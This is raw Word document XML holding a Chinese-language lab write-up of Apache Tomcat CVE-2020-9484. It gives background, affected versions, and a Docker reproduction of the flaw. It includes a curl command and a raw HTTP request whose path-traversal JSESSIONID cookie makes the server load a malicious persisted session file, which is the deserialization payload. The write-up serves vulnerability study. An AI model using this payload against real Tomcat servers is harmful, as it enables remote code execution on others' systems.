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8DFF0" w14:textId="6AC00382" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Gothic"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>omcat漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696E52C" w14:textId="69708C72" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>CVE-2020-9484 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E5F1A" w14:textId="7F292B56" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15735638" w14:textId="1B027B0B" w:rsidR="00202706" w:rsidRDefault="006973A0" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF59CB" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于一个企业级应用而言，</w:t>
      </w:r>
      <w:r>
        <w:t>Session对象的管理十分重要。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sessio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>对象的信息一般情况下置于服务器的内存中，当服务器由于故障重启，或应用重新加载 时候，此时的Session信息将全部丢失。为了避免这样的情况，在某些场合可以将服务器的Session数据存放在文件系统或数据库中，这样的操作称为 Session对象的持久化。Session对象在持久化时，存放在其中的对象以序列化的形式存放，这就是为什么一般存放在Session中的数据需要实 现可序列化接口（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>java.io.Serializable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）的原因了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE4841B" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="48ACE4F6" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当一个</w:t>
      </w:r>
      <w:r>
        <w:t>Session开始时，Servlet容器会为Session创建一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">对象。Servlet容器在某些情况下把这些 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">对象从内存中转移到文件系统或数据库中，在需要访问 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>信息时再把它们加载到内存中。(tomcat使用了自带session同步功能时，不安全的配置（没有使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EncryptInterceptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）导致存在的反序列化漏洞，通过精心构造的数据包， 可以对使用了tomcat自带session同步功能的服务器进行攻击。)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD89373" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="2E9D73B4" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C7A75" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="01A2D1F2" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、影响版本和不影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CD28E" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="2A0680C8" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受影响产品版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56874CE0" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="1F9D0D83" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 10.x &lt; 10.0.0-M5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671C0FC9" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="3A9690E0" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 9.x &lt; 9.0.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40A8B5" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="7494FE98" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 8.x &lt; 8.5.55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7FB11" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="4E6779BE" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 7.x &lt; 7.0.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B63B32" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="5409F0D0" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不受影响产品版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C683AF3" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="65AA3885" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 10.x &gt;= 10.0.0-M5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4721A7" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="19E2ED9F" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 9.x &gt;= 9.0.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C29A18" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="119E6071" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 8.x &gt;= 8.5.55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E67ABD" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="3BFF542A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Apache Tomcat 7.x &gt;= 7.0.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4CAF3E" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="11EBAB27" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911B18A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="56D4C1B7" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18675E" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="32424B7A" w14:textId="183976BB" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> git clone https://github.com/masahiro331/CVE-2020-9484.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456685A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="71EE2726" w14:textId="4DEA2B52" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">$ git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="004E400E" w:rsidRPr="00D21343">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://github.com/masahiro331/CVE-2020-9484.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A643F08" w14:textId="5AD25BA6" w:rsidR="004E400E" w:rsidRPr="004E400E" w:rsidRDefault="004E400E" w:rsidP="00202706">
      <w:r>
        <w:t>git clone http://github.com/masahiro331/CVE-2020-9484.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5860D091" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>$ cd CVE-2020-9484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E3CF2" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">$ docker build -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tomcat:groovy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4C377" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">$ docker run -d -p 8080:8080 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tomcat:groovy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="482B84DF" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="48953448" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拉取</w:t>
      </w:r>
      <w:r>
        <w:t>docker镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F037CC2" w14:textId="5FE80764" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637077F2" wp14:editId="1C06F49B">
            <wp:extent cx="5274310" cy="4281170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1378860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60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6B5" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:t>tomcat模拟集群</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20008B7E" w14:textId="0316D214" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D860DFA" wp14:editId="2980009C">
            <wp:extent cx="5274310" cy="664210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="358544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4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D2A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始服务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> docker run -d -p 8080:8080 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tomcat:groovy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="630FBD88" w14:textId="6D7EBAE0" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D41C89" wp14:editId="691E7615">
            <wp:extent cx="5274310" cy="791210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="588011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11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EC1C" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>http://192.168.0.102:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFCE8FB" w14:textId="215E1261" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F3D600" wp14:editId="2AB23FA1">
            <wp:extent cx="5274310" cy="2282825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="2021772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72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1A9" w14:textId="35F4BD62" w:rsidR="00990C46" w:rsidRDefault="00990C46" w:rsidP="00202706">
      <w:r>
        <w:t>docker exec -it ec56d03957a1 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782B3EF" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>下面的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DADFE" w14:textId="05641393" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7353DD23" wp14:editId="4B266E4C">
            <wp:extent cx="5274310" cy="907415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="2066273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73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1CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009921CF">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7548BEC4" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞执行</w:t>
      </w:r>
      <w:r>
        <w:t>POC通过JSESSION加载恶意的session持久化文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB48B6" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="4BB129FC" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="006973A0">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>curl 'http://192.168.0.102:8080/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' -H 'Cookie: JSESSIONID</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/tomcat/groovy'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A48768" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="50EB8FF9" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者抓包执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF3293" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="1444198E" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139522A6" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Host: 192.168.0.102:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5EE769" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>Cookie: JSESSIONID=JSESSIONID</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/tomcat/groovy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E08E52" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="5BC0BE33" w14:textId="428C2EB1" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行图片</w:t>
      </w:r>
      <w:r w:rsidR="009921CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4D7F46" w14:textId="11476B52" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BECEC72" wp14:editId="0FB7D3EC">
            <wp:extent cx="5834380" cy="2238643"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="154835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2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754" cy="22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649E" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>下面的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D8C01E" w14:textId="7F067022" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3508C449" wp14:editId="7F95BB1E">
            <wp:extent cx="5274310" cy="1109980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1284529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29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F3A6" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>### tomcat-session同步配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5FC5A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="490EC264" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>&lt;Server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56444AEC" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB1C59" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B494B" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">    &lt;Service&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B77640" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">        ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D402AF9" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BD80DE" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">        &lt;Engine&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E057DBE" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B5CB9A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40509ACD" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            &lt;Cluster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org.apache.catalina.ha.tcp.SimpleTcpCluster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F8BBA" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>channelSendOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B055EE" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD72EF" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    &lt;Manager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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.catalina.ha.session.BackupManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F351C" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expireSessionsOnShutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="false"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF5376F" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>notifyListenersOnReplication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="true"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C6303" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mapSendOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="6"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F1AB8" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0DA43" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8218E1" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    &lt;Channel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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.catalina.tribes.group.GroupChannel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23012FBB" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      &lt;Membership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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.catalina.tribes.membership.McastService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F90D10D" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
